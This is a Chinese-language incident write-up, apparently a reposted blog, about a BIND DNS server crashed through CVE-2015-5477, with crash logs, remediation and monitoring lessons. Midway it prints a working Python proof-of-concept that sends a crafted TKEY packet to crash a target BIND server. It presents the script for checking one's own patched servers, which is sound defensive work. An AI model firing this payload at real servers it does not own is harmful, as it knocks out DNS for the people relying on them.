公司DNS被攻击及解决办法

DNS服务器被攻击 今天给大家说说我们的DNS服务器被攻击及解决办法。

问题现象

今天上午10:30左右,公司的DNS服务器被攻击,导致平台部分服务不能访问。这时最先报警的是Zabbix,报出大量的主机宕机了。接到Zabbix报警后,赶紧登陆一台被监控节点,发现Zabbix agent进程是存在的,但是不能ping通Zabbix server节点,说明DNS出现了问题。

登陆DNS服务器,发现bind进程已经不存在了。赶紧查看日志,发现有如下的错误:

03-Jan-2017 10:28:22.208 general: critical: message.c:2335: REQUIRE(*name == ((void *)0)) failed, back trace
03-Jan-2017 10:28:22.208 general: critical: #0 0x417a3b in assertion_failed()+0x4b
03-Jan-2017 10:28:22.208 general: critical: #1 0x5d04ba in isc_assertion_failed()+0xa
03-Jan-2017 10:28:22.208 general: critical: #2 0x4afd13 in dns_message_findname()+0x143
03-Jan-2017 10:28:22.208 general: critical: #3 0x557d84 in dns_tkey_processquery()+0x184
03-Jan-2017 10:28:22.208 general: critical: #4 0x42ea10 in ns_query_start()+0x3c0
03-Jan-2017 10:28:22.208 general: critical: #5 0x40d44a in client_request()+0xa3a
03-Jan-2017 10:28:22.208 general: critical: #6 0x5f2dcb in run()+0x2ab
03-Jan-2017 10:28:22.208 general: critical: #7 0x348d2079d1 in _fini()+0x348cbfb139
03-Jan-2017 10:28:22.208 general: critical: #8 0x348cae886d in _fini()+0x348c4dbfd5
03-Jan-2017 10:28:22.208 general: critical: exiting (due to assertion failure)

这个就是2015年7月份爆出的CVE-2015-5477漏洞(拒绝服务漏洞),受影响的bind版本为9.x系列。由于TKEY查询的错误可导致BIND服务器发生REQUIRE断言失败并停止服务,攻击者利用漏洞可恶意构造数据包,导致TKEY记录查询错误,进而导致BIND服务器发生REQUIRE断言失败并停止服务。

解决办法

升级新版本的bind,然后进行测试,验证是否还存在此漏洞。测试脚本为:

#!/usr/bin/env python
import socket
import sys

print('CVE-2015-5477 BIND9 TKEY PoC')
if len(sys.argv) < 2:
    print('Usage: ' + sys.argv[0] + ' [target]')
    sys.exit(1)
print('Sending packet to ' + sys.argv[1] + ' ...')
payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 
03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))
print('Done.')

上面的脚本具有一定的攻击性,请大家不要随便使用。不过可以针对自己家公司的DNS服务器进行内测,如果发现有问题,则赶紧升级DNS软件。

如何做到bind进程的高可用行:

  • 操作系统需要被监控(系统不监控会被打死的),监控系统是否宕机
  • 进程需要做到高可用(使用supervisor来管理进程),named进程异常退出可以自动启动
  • 监控named进程,进程不存在则报警

事后总结

上班第一天就遇到此问题,犹如当头一棒,让我清醒了很多。还是没有做到位,这台机器没有做任何监控。这次遇到这个问题,没有第一时间抓紧恢复,而是解决Zabbix问题。

针对上述发生的问题,汲取了如下几点经验教训:

  • 遇到故障问题,抓紧时间恢复是第一要务
  • 复盘故障问题,找出根本原因
  • 找出解决故障或问题的办法或如何避免类似的故障

原文发布于微信公众号 - 小白的技术客栈(XBDJSKZ)

原文发表时间:2017-09-09

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

雪人行动:利用IE10 0day漏洞的APT攻击剑指美国军方情报

二月十一日,FireEye捕获了一次基于0day漏洞的攻击,这次攻击针对美国的一个退伍兵网站(bfw.org)。 我们确信这次攻击是针对美国高层军方人员的一次...

1988
来自专栏Debian社区

Ubuntu 17.04(Zesty Zapus)正式版发布

今天,2017 年 4 月 13 日,Canonical 官方发布了 Ubuntu 17.04(Zesty Zapus)的最终版。自从去年十月发布 Ubuntu...

1375
来自专栏西枫里博客

阿里短信通知的接入与实现(二)暨云通信短信平台API接口调用

事情变化太快,上线还不到一个月的注册短信验证功能就遇到了平台搬家的尴尬。阿里云发了一个邮件通知。原淘宝短信和阿里云市场短信将迁移到云通信平台,自2018年1月2...

2163
来自专栏刘望舒

如何开发一个简单好用的RxBus

在Android开发中,事件总线的库往往是开发必备的利器之一,我经历的几个开发项目,都无一例外的引用了事件总线的库,因为它能帮助我们非常简单的实现组件之间的通信...

943
来自专栏帘卷西风的专栏

关于cocos2dx手游lua文件加密的解决方案

      很多使用cocos2dx+lua做游戏的同学,都会想到一个问题,我的游戏一旦发布,怎样才能保证的我脚本代码不被破解,不泄露代码。虽然这和开源、共享的...

1142
来自专栏腾讯技术工程官方号的专栏

PGXZ 腾讯分布式关系数据集群—架构解析

本文作者:数据平台部存储引擎组PGXZ项目负责人,2013年从华为加入腾讯,从事数据库和存储相关的工作。多年来一直致力于数据库引擎的研究和开发,从事过多款数据库...

30311
来自专栏FreeBuf

窃听风云:扒掉你的最后一条“胖次”

“每个人的手机都是一部窃听器,不管你开不开机,都能被窃听。”在2009年上映的《窃听风云》中吴彦祖饰演的人物有这样一句台词,随着影片热映,“手机窃听”的问题被更...

1313
来自专栏黑白安全

注入利器之“四人帮”

“注入”者,名如其义,在与对方数据库的一次次“别有用心”刺探访问中猜解出那些敏感信息的长要、范围,最终精确到点,颇有些让自己战友悄悄地打入敌人内部一样。看危险漫...

711
来自专栏阮一峰的网络日志

ubuntu的不同版本

ubuntu是现在最流行的Linux安装包,本文介绍了ubuntu的各种版本。 一、Ubuntu ? 每个ubuntu的版本都包含一个版本号(version n...

70210
来自专栏乐沙弥的世界

联机日志文件过小引发的log file 相关等待

      Oracle 联机重做日志文件记录了数据库的所有变化(DML,DDL或管理员对数据所作的结构性更改等),用于对于意外删除或宕机利用日志文件实现数据恢...

892

扫码关注云+社区